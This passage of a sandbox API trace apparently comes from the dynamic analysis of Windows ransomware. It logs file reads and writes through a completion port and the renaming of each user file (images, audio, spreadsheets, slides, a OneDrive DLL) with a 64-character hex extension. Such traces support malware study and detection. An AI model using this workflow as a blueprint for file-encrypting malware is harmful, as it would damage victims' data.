nNumberOfBytesToWrite=0x4e00, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7422068 | out: lpBuffer=0x74421a0*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7422068) returned 1 [0160.506] RtlInterlockedCompareExchange64 () returned 0x2 [0160.506] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8) returned 1 [0160.510] ReadFile (in: hFile=0x5b0, lpBuffer=0x752a2a8, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x750a170 | out: lpBuffer=0x752a2a8*, lpNumberOfBytesRead=0x0, lpOverlapped=0x750a170) returned 1 [0160.511] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8) returned 1 [0160.524] ReadFile (in: hFile=0x5b8, lpBuffer=0x757a558, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x755a420 | out: lpBuffer=0x757a558*, lpNumberOfBytesRead=0x0, 
lpOverlapped=0x755a420) returned 1 [0160.524] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8) returned 1 [0160.576] NtQueryObject (in: Handle=0x5a8, ObjectInformationClass=0x1, ObjectInformation=0x73e00f8, ObjectInformationLength=0x10004, ReturnLength=0x708f9e4 | out: ObjectInformation=0x73e00f8, ReturnLength=0x708f9e4) returned 0x0 [0160.577] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ETWlog.dll", lpString2=".0498AA29D7460559A0AE5491BFF5C482572C81400B61E0F9685F7B543025C63E" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ETWlog.dll.0498AA29D7460559A0AE5491BFF5C482572C81400B61E0F9685F7B543025C63E") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ETWlog.dll.0498AA29D7460559A0AE5491BFF5C482572C81400B61E0F9685F7B543025C63E" [0160.577] GetProcessHeap () returned 0x270000 [0160.578] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x15a) returned 0x327fc8 [0160.578] NtSetInformationFile (FileHandle=0x5a8, IoStatusBlock=0x708f9d4, FileInformation=0x327fc8, Length=0x15a, FileInformationClass=0xa) returned 0x0 [0160.804] CloseHandle (hObject=0x5a8) returned 1 [0160.914] GetProcessHeap () returned 0x270000 [0160.915] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73e0048 | out: hHeap=0x270000) returned 1 [0160.915] RtlInterlockedCompareExchange64 () returned 0x7 [0160.916] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8) returned 1 
[0163.869] ReadFile (in: hFile=0x5b4, lpBuffer=0x7552400, nNumberOfBytesToRead=0x1200, lpNumberOfBytesRead=0x0, lpOverlapped=0x75322c8 | out: lpBuffer=0x7552400*, lpNumberOfBytesRead=0x0, lpOverlapped=0x75322c8) returned 1 [0163.869] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8) returned 1 [0163.869] NtQueryObject (in: Handle=0x5bc, ObjectInformationClass=0x1, ObjectInformation=0x75aa780, ObjectInformationLength=0x10004, ReturnLength=0x708f9e4 | out: ObjectInformation=0x75aa780, ReturnLength=0x708f9e4) returned 0x0 [0163.871] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\SoftBlue.jpg", lpString2=".928729048E870FF1A8BE53DF61BA0083206F6394E35203AB9DEF5E0578CD320E" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\SoftBlue.jpg.928729048E870FF1A8BE53DF61BA0083206F6394E35203AB9DEF5E0578CD320E") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\SoftBlue.jpg.928729048E870FF1A8BE53DF61BA0083206F6394E35203AB9DEF5E0578CD320E" [0163.871] GetProcessHeap () returned 0x270000 [0163.871] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x15e) returned 0x42faf40 [0163.871] NtSetInformationFile (FileHandle=0x5bc, IoStatusBlock=0x708f9d4, FileInformation=0x42faf40, Length=0x15e, FileInformationClass=0xa) returned 0x0 [0163.908] CloseHandle (hObject=0x5bc) returned 1 [0163.913] GetProcessHeap () returned 0x270000 [0163.914] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x75aa6d0 | out: hHeap=0x270000) returned 1 [0163.917] RtlInterlockedCompareExchange64 () returned 0x2 [0163.917] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, 
lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8) returned 1 [0164.456] ReadFile (in: hFile=0x58c, lpBuffer=0x752a2a8, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x750a170 | out: lpBuffer=0x752a2a8*, lpNumberOfBytesRead=0x0, lpOverlapped=0x750a170) returned 1 [0164.457] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8) returned 1 [0164.458] NtQueryObject (in: Handle=0x5c4, ObjectInformationClass=0x1, ObjectInformation=0x7668508, ObjectInformationLength=0x10004, ReturnLength=0x708f9e4 | out: ObjectInformation=0x7668508, ReturnLength=0x708f9e4) returned 0x0 [0164.459] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\SWYB2x61O.ods", lpString2=".AC0B7359F991CEF951AEA05466E4392A982FAA232C9FF769D6749C1512BA6414" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\SWYB2x61O.ods.AC0B7359F991CEF951AEA05466E4392A982FAA232C9FF769D6749C1512BA6414") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\SWYB2x61O.ods.AC0B7359F991CEF951AEA05466E4392A982FAA232C9FF769D6749C1512BA6414" [0164.459] GetProcessHeap () returned 0x270000 [0164.459] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x126) returned 0x425d2d0 [0164.459] NtSetInformationFile (FileHandle=0x5c4, IoStatusBlock=0x708f9d4, FileInformation=0x425d2d0, Length=0x126, FileInformationClass=0xa) returned 0x0 [0164.461] CloseHandle (hObject=0x5c4) returned 1 [0164.465] GetProcessHeap () returned 0x270000 [0164.467] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7668458 | out: hHeap=0x270000) returned 1 [0164.700] 
RtlInterlockedCompareExchange64 () returned 0x3 [0164.700] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8) returned 1 [0165.672] ReadFile (in: hFile=0x5e4, lpBuffer=0x7400180, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x73e0048 | out: lpBuffer=0x7400180*, lpNumberOfBytesRead=0x0, lpOverlapped=0x73e0048) returned 1 [0165.672] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8) returned 1 [0165.675] NtQueryObject (in: Handle=0x5e4, ObjectInformationClass=0x1, ObjectInformation=0x73e00f8, ObjectInformationLength=0x10004, ReturnLength=0x708f9e4 | out: ObjectInformation=0x73e00f8, ReturnLength=0x708f9e4) returned 0x0 [0165.676] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Roaming\\Oz2eLzn.mp3", lpString2=".87DB4288DA308E8F8C15B3A0D70C35AB715D9C71A21DAAEFF9FD07874374666C" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Roaming\\Oz2eLzn.mp3.87DB4288DA308E8F8C15B3A0D70C35AB715D9C71A21DAAEFF9FD07874374666C") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Roaming\\Oz2eLzn.mp3.87DB4288DA308E8F8C15B3A0D70C35AB715D9C71A21DAAEFF9FD07874374666C" [0165.676] GetProcessHeap () returned 0x270000 [0165.676] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x11c) returned 0x4276650 [0165.676] NtSetInformationFile (FileHandle=0x5e4, IoStatusBlock=0x708f9d4, FileInformation=0x4276650, Length=0x11c, FileInformationClass=0xa) returned 0x0 [0165.679] CloseHandle (hObject=0x5e4) returned 1 [0165.680] GetProcessHeap () returned 0x270000 [0165.681] HeapFree (in: 
hHeap=0x270000, dwFlags=0x0, lpMem=0x73e0048 | out: hHeap=0x270000) returned 1 [0165.681] RtlInterlockedCompareExchange64 () returned 0x1 [0165.681] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8) returned 1 [0165.685] ReadFile (in: hFile=0x5e4, lpBuffer=0x7400180, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x73e0048 | out: lpBuffer=0x7400180*, lpNumberOfBytesRead=0x0, lpOverlapped=0x73e0048) returned 1 [0165.690] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8) returned 1 [0165.692] NtQueryObject (in: Handle=0x5e4, ObjectInformationClass=0x1, ObjectInformation=0x73e00f8, ObjectInformationLength=0x10004, ReturnLength=0x708f9e4 | out: ObjectInformation=0x73e00f8, ReturnLength=0x708f9e4) returned 0x0 [0165.693] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Roaming\\qoQusl.m4a", lpString2=".13D7727BD4961ACF26BCC63E1A9A27F416F55DC5EE327E3D0681E94A82973538" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Roaming\\qoQusl.m4a.13D7727BD4961ACF26BCC63E1A9A27F416F55DC5EE327E3D0681E94A82973538") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Roaming\\qoQusl.m4a.13D7727BD4961ACF26BCC63E1A9A27F416F55DC5EE327E3D0681E94A82973538" [0165.693] GetProcessHeap () returned 0x270000 [0165.693] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x11a) returned 0x4276778 [0165.693] NtSetInformationFile (FileHandle=0x5e4, IoStatusBlock=0x708f9d4, FileInformation=0x4276778, Length=0x11a, FileInformationClass=0xa) returned 0x0 [0165.694] CloseHandle (hObject=0x5e4) 
returned 1 [0165.696] GetProcessHeap () returned 0x270000 [0165.697] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73e0048 | out: hHeap=0x270000) returned 1 [0165.697] RtlInterlockedCompareExchange64 () returned 0x1 [0165.697] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8) returned 1 [0165.701] ReadFile (in: hFile=0x5e4, lpBuffer=0x7400180, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x73e0048 | out: lpBuffer=0x7400180*, lpNumberOfBytesRead=0x0, lpOverlapped=0x73e0048) returned 1 [0165.701] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8) returned 1 [0165.703] NtQueryObject (in: Handle=0x5e4, ObjectInformationClass=0x1, ObjectInformation=0x73e00f8, ObjectInformationLength=0x10004, ReturnLength=0x708f9e4 | out: ObjectInformation=0x73e00f8, ReturnLength=0x708f9e4) returned 0x0 [0165.704] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Roaming\\QSp2x.ods", lpString2=".074E09C1A77E31B302DE15E4DE192FC08564B4AFFC9B6035479B6274485BBC1F" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Roaming\\QSp2x.ods.074E09C1A77E31B302DE15E4DE192FC08564B4AFFC9B6035479B6274485BBC1F") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Roaming\\QSp2x.ods.074E09C1A77E31B302DE15E4DE192FC08564B4AFFC9B6035479B6274485BBC1F" [0165.704] GetProcessHeap () returned 0x270000 [0165.704] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x118) returned 0x42768a0 [0165.704] NtSetInformationFile (FileHandle=0x5e4, IoStatusBlock=0x708f9d4, FileInformation=0x42768a0, Length=0x118, 
FileInformationClass=0xa) returned 0x0 [0165.706] CloseHandle (hObject=0x5e4) returned 1 [0165.707] GetProcessHeap () returned 0x270000 [0165.708] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73e0048 | out: hHeap=0x270000) returned 1 [0165.708] RtlInterlockedCompareExchange64 () returned 0x1 [0165.708] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8) returned 1 [0165.711] ReadFile (in: hFile=0x5e4, lpBuffer=0x7400180, nNumberOfBytesToRead=0x6200, lpNumberOfBytesRead=0x0, lpOverlapped=0x73e0048 | out: lpBuffer=0x7400180*, lpNumberOfBytesRead=0x0, lpOverlapped=0x73e0048) returned 1 [0165.711] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8) returned 1 [0165.713] NtQueryObject (in: Handle=0x5e4, ObjectInformationClass=0x1, ObjectInformation=0x73e00f8, ObjectInformationLength=0x10004, ReturnLength=0x708f9e4 | out: ObjectInformation=0x73e00f8, ReturnLength=0x708f9e4) returned 0x0 [0165.714] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Roaming\\RBbwYGkm_WNBvZLE_av.png", lpString2=".6E39806B12DF61A00DA35CAF2E3A3E2C06E493F35873A6035B58F0BC5633B53A" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Roaming\\RBbwYGkm_WNBvZLE_av.png.6E39806B12DF61A00DA35CAF2E3A3E2C06E493F35873A6035B58F0BC5633B53A") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Roaming\\RBbwYGkm_WNBvZLE_av.png.6E39806B12DF61A00DA35CAF2E3A3E2C06E493F35873A6035B58F0BC5633B53A" [0165.714] GetProcessHeap () returned 0x270000 [0165.714] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x134) returned 
0x4262de0 [0165.714] NtSetInformationFile (FileHandle=0x5e4, IoStatusBlock=0x708f9d4, FileInformation=0x4262de0, Length=0x134, FileInformationClass=0xa) returned 0x0 [0165.716] CloseHandle (hObject=0x5e4) returned 1 [0165.716] GetProcessHeap () returned 0x270000 [0165.718] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73e0048 | out: hHeap=0x270000) returned 1 [0165.718] RtlInterlockedCompareExchange64 () returned 0x1 [0165.718] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8) returned 1 [0165.719] WriteFile (in: hFile=0x598, lpBuffer=0x74e2140*, nNumberOfBytesToWrite=0x6000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008) returned 1 [0165.721] RtlInterlockedCompareExchange64 () returned 0x0 [0165.721] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8) returned 1 [0165.734] NtQueryObject (in: Handle=0x5b8, ObjectInformationClass=0x1, ObjectInformation=0x76900b8, ObjectInformationLength=0x10004, ReturnLength=0x708f9e4 | out: ObjectInformation=0x76900b8, ReturnLength=0x708f9e4) returned 0x0 [0165.735] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Roaming\\Nt0kouwsI.jpg", lpString2=".1C523A7BAFD40988E6967FD3D88417BA4CD837F495288E0E9819A212BA7D332A" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Roaming\\Nt0kouwsI.jpg.1C523A7BAFD40988E6967FD3D88417BA4CD837F495288E0E9819A212BA7D332A") 
returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Roaming\\Nt0kouwsI.jpg.1C523A7BAFD40988E6967FD3D88417BA4CD837F495288E0E9819A212BA7D332A" [0165.735] GetProcessHeap () returned 0x270000 [0165.735] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x120) returned 0x4276af0 [0165.735] NtSetInformationFile (FileHandle=0x5b8, IoStatusBlock=0x708f9d4, FileInformation=0x4276af0, Length=0x120, FileInformationClass=0xa) returned 0x0 [0165.737] CloseHandle (hObject=0x5b8) returned 1 [0165.738] GetProcessHeap () returned 0x270000 [0165.739] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7690008 | out: hHeap=0x270000) returned 1 [0165.739] RtlInterlockedCompareExchange64 () returned 0x1 [0165.739] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8) returned 1 [0165.746] ReadFile (in: hFile=0x5b8, lpBuffer=0x74e2140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008) returned 1 [0165.746] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8) returned 1 [0165.750] ReadFile (in: hFile=0x598, lpBuffer=0x76b0140, nNumberOfBytesToRead=0x2400, lpNumberOfBytesRead=0x0, lpOverlapped=0x7690008 | out: lpBuffer=0x76b0140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x7690008) returned 1 [0165.750] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, 
lpOverlapped=0x708f9e8) returned 1 [0165.756] NtQueryObject (in: Handle=0x598, ObjectInformationClass=0x1, ObjectInformation=0x76900b8, ObjectInformationLength=0x10004, ReturnLength=0x708f9e4 | out: ObjectInformation=0x76900b8, ReturnLength=0x708f9e4) returned 0x0 [0165.757] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Roaming\\s1X1py5zOF.pptx", lpString2=".9FAE2EADCCD86898B268788BEFE13368019D1F6DA9DA63D73ADF6AD9C4A2CF16" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Roaming\\s1X1py5zOF.pptx.9FAE2EADCCD86898B268788BEFE13368019D1F6DA9DA63D73ADF6AD9C4A2CF16") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Roaming\\s1X1py5zOF.pptx.9FAE2EADCCD86898B268788BEFE13368019D1F6DA9DA63D73ADF6AD9C4A2CF16" [0165.757] GetProcessHeap () returned 0x270000 [0165.757] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x124) returned 0x741c440 [0165.757] NtSetInformationFile (FileHandle=0x598, IoStatusBlock=0x708f9d4, FileInformation=0x741c440, Length=0x124, FileInformationClass=0xa) returned 0x0 [0165.760] CloseHandle (hObject=0x598) returned 1 [0165.761] GetProcessHeap () returned 0x270000 [0165.762] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7690008 | out: hHeap=0x270000) returned 1 [0165.763] RtlInterlockedCompareExchange64 () returned 0x1 [0165.763] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8) returned 1 [0165.767] ReadFile (in: hFile=0x598, lpBuffer=0x76b0140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x7690008 | out: lpBuffer=0x76b0140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x7690008) returned 1 [0165.768] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8, 
dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8) returned 1 [0165.770] NtQueryObject (in: Handle=0x598, ObjectInformationClass=0x1, ObjectInformation=0x76900b8, ObjectInformationLength=0x10004, ReturnLength=0x708f9e4 | out: ObjectInformation=0x76900b8, ReturnLength=0x708f9e4) returned 0x0 [0165.771] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Roaming\\UO5iMAxdE5LXqP1Rk D1.gif", lpString2=".8A50E024101A76C7892D4F598622B6E1B9A1BFBD7CE511E4EC334EF114A51013" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Roaming\\UO5iMAxdE5LXqP1Rk D1.gif.8A50E024101A76C7892D4F598622B6E1B9A1BFBD7CE511E4EC334EF114A51013") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Roaming\\UO5iMAxdE5LXqP1Rk D1.gif.8A50E024101A76C7892D4F598622B6E1B9A1BFBD7CE511E4EC334EF114A51013" [0165.771] GetProcessHeap () returned 0x270000 [0165.771] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x136) returned 0x4262f28 [0165.771] NtSetInformationFile (FileHandle=0x598, IoStatusBlock=0x708f9d4, FileInformation=0x4262f28, Length=0x136, FileInformationClass=0xa) returned 0x0 [0165.816] CloseHandle (hObject=0x598) returned 1 [0165.825] GetProcessHeap () returned 0x270000 [0165.826] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7690008 | out: hHeap=0x270000) returned 1 [0165.826] RtlInterlockedCompareExchange64 () returned 0x2 [0165.826] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8) returned 1 [0165.853] ReadFile (in: hFile=0x5a4, lpBuffer=0x76b0140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x7690008 | out: lpBuffer=0x76b0140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x7690008) returned 1 [0165.854] 
GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8) returned 1 [0165.861] ReadFile (in: hFile=0x598, lpBuffer=0x746a2f8, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x744a1c0 | out: lpBuffer=0x746a2f8*, lpNumberOfBytesRead=0x0, lpOverlapped=0x744a1c0) returned 1 [0165.861] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8) returned 1 [0165.869] ReadFile (in: hFile=0x58c, lpBuffer=0x7492450, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x7472318 | out: lpBuffer=0x7492450*, lpNumberOfBytesRead=0x0, lpOverlapped=0x7472318) returned 1 [0165.869] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8) returned 1 [0165.870] WriteFile (in: hFile=0x58c, lpBuffer=0x7492450*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7472318 | out: lpBuffer=0x7492450*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7472318) returned 1 [0165.873] RtlInterlockedCompareExchange64 () returned 0x1 [0165.873] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8) returned 1 [0165.881] ReadFile (in: hFile=0x5b0, lpBuffer=0x7610188, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, 
